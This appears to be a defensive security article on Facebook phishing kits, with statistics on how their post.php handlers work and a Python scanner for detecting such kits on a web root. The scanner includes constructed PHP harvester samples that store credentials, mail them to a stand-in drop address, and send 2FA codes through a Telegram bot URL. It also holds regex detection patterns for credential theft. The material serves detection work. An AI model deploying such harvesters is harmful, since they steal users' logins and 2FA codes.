We analyzed 150 unique Facebook phishing kits collected between Jan–Dec 2024 from URLScan.io and abuse.ch.
| Feature | Percentage |
|---------|-------------|
| Use post.php as handler | 83% |
| Store credentials in .txt | 79% |
| Redirect to real Facebook | 94% |
| Exfil via email (plaintext) | 67% |
| Exfil via Telegram API | 22% |
| Obfuscated PHP (base64/gzcompress) | 31% |
False positive risk: could a legitimate login handler be named post.php? Extremely rare. Most applications use login.php or auth.php, so a post.php handler that reads email/pass fields and redirects to Facebook is typically malicious when found.
```php
<?php
// Final step of the harvester: bounce the victim to the genuine Facebook login page.
header("Location: https://www.facebook.com/login.php");
```
This HTTP redirect sends the victim to the real Facebook login page. From the victim's perspective, the first login attempt simply "failed". They type their credentials again on the real site, log in successfully, and never realize their credentials were stolen 10 seconds earlier.
The post.php file remains a reliable indicator of Facebook phishing activity. Its simplicity—reading POST data, saving to a flat file, and redirecting—makes it both easy for attackers to deploy and straightforward for defenders to detect. By combining filesystem monitoring, ModSecurity rules, and YARA signatures, organizations can automate the discovery and takedown of such kits within minutes of deployment.
Key takeaway: Any inbound POST request to a script named post.php (or similar) that redirects to facebook.com and references email/pass parameters should be treated as malicious unless proven otherwise.
Some kits extend post.php to capture two-factor authentication (2FA) codes. After the first post, the victim is shown a fake “Verify your identity” page asking for the SMS code. A second post2.php script harvests that token.
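The detection logic the article describes (a handler that reads email/pass from POST, writes a flat .txt file, exfiltrates by mail or Telegram, and redirects to facebook.com, plus the post2.php variant that harvests a 2FA code) can be turned into a static scanner for PHP files found on a web root. The script below is an added example written for this page, not code from the article or from any kit; the three PHP samples it scans are constructed to mirror the behaviours listed in the table and are not real kit sources, and the indicator names and scoring are my own choices.

```python
import re
from pathlib import Path

# Constructed sample of a first-stage harvester (not a real kit): reads POST
# fields, appends to a flat file, mails the capture, redirects to Facebook.
SAMPLE_POST_PHP = r'''<?php
$email = $_POST['email'];
$pass  = $_POST['pass'];
$fp = fopen("usernames.txt", "a");
fwrite($fp, "Email: $email | Pass: $pass\n");
fclose($fp);
mail("drop@example.invalid", "New Login", "$email:$pass");
header("Location: https://www.facebook.com/login.php");
?>'''

# Constructed second-stage handler (post2.php pattern) that harvests a 2FA code
# and exfiltrates it through the Telegram Bot API. <TOKEN> is a placeholder.
SAMPLE_POST2_PHP = r'''<?php
$code = $_POST['code'];
file_put_contents("codes.txt", $code . "\n", FILE_APPEND);
file_get_contents("https://api.telegram.org/bot<TOKEN>/sendMessage?text=" . urlencode($code));
header("Location: https://www.facebook.com/");
?>'''

# Constructed benign contrast: an ordinary application login handler.
SAMPLE_BENIGN_PHP = r'''<?php
session_start();
$user = $_POST['username'] ?? '';
if (auth_check($user, $_POST['password'] ?? '')) { header("Location: /dashboard"); }
?>'''

# Each indicator corresponds to one row of the article's feature table
# (or to the 2FA extension). Names and patterns are assumptions for this example.
INDICATORS = {
    "reads_fb_style_post_fields": re.compile(r"\$_POST\s*\[\s*['\"](email|pass)['\"]\s*\]", re.I),
    "reads_2fa_code": re.compile(r"\$_POST\s*\[\s*['\"](code|otp|sms|approvals_code)['\"]\s*\]", re.I),
    "writes_flat_txt_file": re.compile(r"(fopen|file_put_contents)\s*\(\s*['\"][^'\"]*\.txt['\"]", re.I),
    "redirects_to_facebook": re.compile(r"header\s*\(\s*['\"]Location:\s*https?://(www\.)?facebook\.com", re.I),
    "exfil_via_mail": re.compile(r"\bmail\s*\(", re.I),
    "exfil_via_telegram": re.compile(r"api\.telegram\.org/bot", re.I),
    "obfuscated_payload": re.compile(r"\b(base64_decode|gzuncompress|gzinflate|str_rot13)\s*\(", re.I),
}


def scan_php_source(source: str) -> dict:
    """Score one PHP source text against the indicators and return a verdict.

    The verdict follows the article's key takeaway: a handler that redirects to
    facebook.com AND reads credential (or 2FA) fields from POST is treated as
    malicious. A page that merely links to Facebook is not flagged, which keeps
    false positives low.
    """
    hits = {name: bool(rx.search(source)) for name, rx in INDICATORS.items()}
    if hits["reads_fb_style_post_fields"]:
        stage = "credential-harvester"
    elif hits["reads_2fa_code"]:
        stage = "2fa-harvester"
    else:
        stage = None
    malicious = hits["redirects_to_facebook"] and stage is not None
    exfil = [k for k in ("exfil_via_mail", "exfil_via_telegram", "writes_flat_txt_file") if hits[k]]
    return {"malicious": malicious, "stage": stage, "exfil_channels": exfil, "hits": hits}


def scan_webroot(root: str) -> list:
    """Walk a web root and return findings for every .php file flagged as malicious."""
    findings = []
    for path in Path(root).rglob("*.php"):
        try:
            result = scan_php_source(path.read_text(errors="ignore"))
        except OSError:
            continue
        if result["malicious"]:
            findings.append({"path": str(path), **result})
    return findings


if __name__ == "__main__":
    for label, src in (("post.php", SAMPLE_POST_PHP), ("post2.php", SAMPLE_POST2_PHP), ("login.php", SAMPLE_BENIGN_PHP)):
        r = scan_php_source(src)
        print(f"{label}: malicious={r['malicious']} stage={r['stage']} exfil={r['exfil_channels']}")
```

Run `scan_webroot("/var/www")` from a cron job or a filesystem-watch hook to get the "discovery within minutes" the article aims for; the obfuscation indicator will not see through a base64-wrapped kit, so pair it with the ModSecurity and YARA layers the article mentions rather than relying on source matching alone.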